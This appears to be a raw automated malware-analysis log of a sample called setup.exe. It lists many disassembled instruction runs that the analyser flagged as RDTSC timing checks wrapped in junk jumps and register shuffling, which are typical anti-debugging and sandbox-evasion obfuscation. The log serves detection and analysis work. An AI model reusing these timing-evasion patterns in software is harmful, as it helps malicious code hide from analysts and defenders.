Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583F07 second address: 583F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD36120Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583F17 second address: 583F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 583F1B second address: 583F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060D28 second address: 5060D50 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 752C2191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F47CD34661Ch 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F47CD34661Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060D50 second address: 5060D77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD361215h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508005F second address: 5080083 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080083 second address: 5080087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080087 second address: 508008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508008D second address: 50800FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47CD36120Bh 0x00000009 adc cx, 3E5Eh 0x0000000e jmp 00007F47CD361219h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F47CD361210h 0x0000001a jmp 00007F47CD361215h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F47CD361213h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50800FE second address: 5080103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080103 second address: 5080119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD361212h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080119 second address: 508015B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007F47CD346621h 0x00000018 adc si, 20B6h 0x0000001d jmp 00007F47CD346621h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508015B second address: 5080177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080177 second address: 508017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508017B second address: 508018E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508018E second address: 5080194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070DBA second address: 5070DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070DC0 second address: 5070E3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e pushfd 0x0000000f jmp 00007F47CD34661Dh 0x00000014 add esi, 5C4D36C6h 0x0000001a jmp 00007F47CD346621h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F47CD34661Eh 0x00000027 mov ebp, esp 0x00000029 jmp 00007F47CD346620h 0x0000002e push dword ptr [ebp+04h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F47CD346627h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E3B second address: 5070E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E41 second address: 5070E45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E45 second address: 5070E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007F47CD361217h 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E70 second address: 5070E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070E74 second address: 5070E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070EC9 second address: 5070ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5070ECD second address: 5070ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50801B3 second address: 50801CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346627h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50801CE second address: 50801D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50801D4 second address: 50801D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50801D8 second address: 508027E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F47CD361214h 0x00000013 add al, 00000028h 0x00000016 jmp 00007F47CD36120Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F47CD361218h 0x00000022 and si, 9488h 0x00000027 jmp 00007F47CD36120Bh 0x0000002c popfd 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007F47CD361219h 0x00000034 xchg eax, ebp 0x00000035 jmp 00007F47CD36120Eh 0x0000003a mov ebp, esp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F47CD361217h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508027E second address: 5080283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508070D second address: 5080739 instructions: 0x00000000 rdtsc 0x00000002 call 00007F47CD36120Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F47CD361211h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080739 second address: 508073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50809F1 second address: 5080A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 44B4h 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080A01 second address: 5080A07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050035 second address: 5050063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361210h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD361217h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050063 second address: 505007B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD346624h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505007B second address: 505007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 505007F second address: 50500F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F47CD34661Ch 0x0000000f pushfd 0x00000010 jmp 00007F47CD346622h 0x00000015 or ecx, 65017498h 0x0000001b jmp 00007F47CD34661Bh 0x00000020 popfd 0x00000021 pop esi 0x00000022 push ebx 0x00000023 pushfd 0x00000024 jmp 00007F47CD346624h 0x00000029 and cx, 1EF8h 0x0000002e jmp 00007F47CD34661Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F47CD346622h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50500F9 second address: 50500FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50500FF second address: 5050123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F47CD34661Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080308 second address: 5080325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080325 second address: 5080335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD34661Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060E89 second address: 5060F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F47CD361213h 0x0000000c add si, 99DEh 0x00000011 jmp 00007F47CD361219h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebp 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 mov di, 72ECh 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F47CD361217h 0x00000030 jmp 00007F47CD361213h 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060F03 second address: 5060F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F47CD346627h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060F27 second address: 5060F72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c jmp 00007F47CD36120Eh 0x00000011 and dword ptr [eax+04h], 00000000h 0x00000015 jmp 00007F47CD361210h 0x0000001a pop ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov esi, 394F73B3h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060F72 second address: 5060F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50807D1 second address: 508083B instructions: 0x00000000 rdtsc 0x00000002 mov esi, 1A6A4881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov ebx, eax 0x0000000c mov esi, 2776A25Fh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov si, di 0x00000018 pushfd 0x00000019 jmp 00007F47CD361217h 0x0000001e adc esi, 291AC05Eh 0x00000024 jmp 00007F47CD361219h 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jmp 00007F47CD361213h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508083B second address: 5080840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080840 second address: 508085B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508085B second address: 508085F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508085F second address: 508087A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 508087A second address: 5080880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060A6E second address: 5060B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushfd 0x00000006 jmp 00007F47CD36120Bh 0x0000000b sbb eax, 5A72A8BEh 0x00000011 jmp 00007F47CD361219h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F47CD36120Eh 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F47CD361211h 0x00000028 or ecx, 7C6225A6h 0x0000002e jmp 00007F47CD361211h 0x00000033 popfd 0x00000034 pushfd 0x00000035 jmp 00007F47CD361210h 0x0000003a or ax, 3348h 0x0000003f jmp 00007F47CD36120Bh 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F47CD361215h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060B18 second address: 5060B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47CD346627h 0x00000009 adc ax, 12EEh 0x0000000e jmp 00007F47CD346629h 0x00000013 popfd 0x00000014 call 00007F47CD346620h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F47CD34661Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060B76 second address: 5060B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5060B7C second address: 5060B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A361C second address: 4A3622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050A56 second address: 5050A5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050A5C second address: 5050AF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47CD361211h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov esi, 311341B3h 0x00000012 mov bl, ch 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov ax, E807h 0x0000001b mov edi, ecx 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F47CD361214h 0x00000026 jmp 00007F47CD361215h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F47CD361210h 0x00000032 xor ecx, 4DE9F548h 0x00000038 jmp 00007F47CD36120Bh 0x0000003d popfd 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F47CD361215h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050AF0 second address: 5050B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD34661Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5050B15 second address: 5050B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080A8A second address: 5080AD3 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov ecx, ebx 0x0000000b pushfd 0x0000000c jmp 00007F47CD34661Bh 0x00000011 and ax, BDCEh 0x00000016 jmp 00007F47CD346629h 0x0000001b popfd 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F47CD34661Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080AD3 second address: 5080AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080AD8 second address: 5080B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov eax, ebx 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jmp 00007F47CD34661Eh 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080B03 second address: 5080B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080B07 second address: 5080B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080B0D second address: 5080B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080B13 second address: 5080B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080B17 second address: 5080B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F483EC36259h 0x0000000d push 76952B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [769B4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 pushad 0x00000053 call 00007F47CD361218h 0x00000058 mov cx, 3E11h 0x0000005c pop esi 0x0000005d push eax 0x0000005e push edx 0x0000005f mov esi, ebx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080B46 second address: 5080B5A instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 202EAD7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov esi, 00000000h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080B5A second address: 5080B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080B5E second address: 5080B8F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F47CD34661Ah 0x00000008 sub si, B898h 0x0000000d jmp 00007F47CD34661Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 mov dword ptr [ebp-1Ch], esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ebx, 56719612h 0x00000023 mov ch, bl 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080BCB second address: 5080C51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47CD36120Bh 0x00000009 adc ecx, 02943C1Eh 0x0000000f jmp 00007F47CD361219h 0x00000014 popfd 0x00000015 mov ah, 91h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test al, al 0x0000001c pushad 0x0000001d jmp 00007F47CD361219h 0x00000022 mov di, cx 0x00000025 popad 0x00000026 je 00007F483EC24F6Ch 0x0000002c pushad 0x0000002d mov edx, eax 0x0000002f push esi 0x00000030 jmp 00007F47CD36120Bh 0x00000035 pop ecx 0x00000036 popad 0x00000037 cmp dword ptr [ebp+08h], 00002000h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F47CD361212h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080CE2 second address: 5080CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080CE8 second address: 5080D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov dx, si 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080D1F second address: 5080D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD34661Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080D2F second address: 5080D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080D33 second address: 5080D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F47CD346623h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5080D51 second address: 5080D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
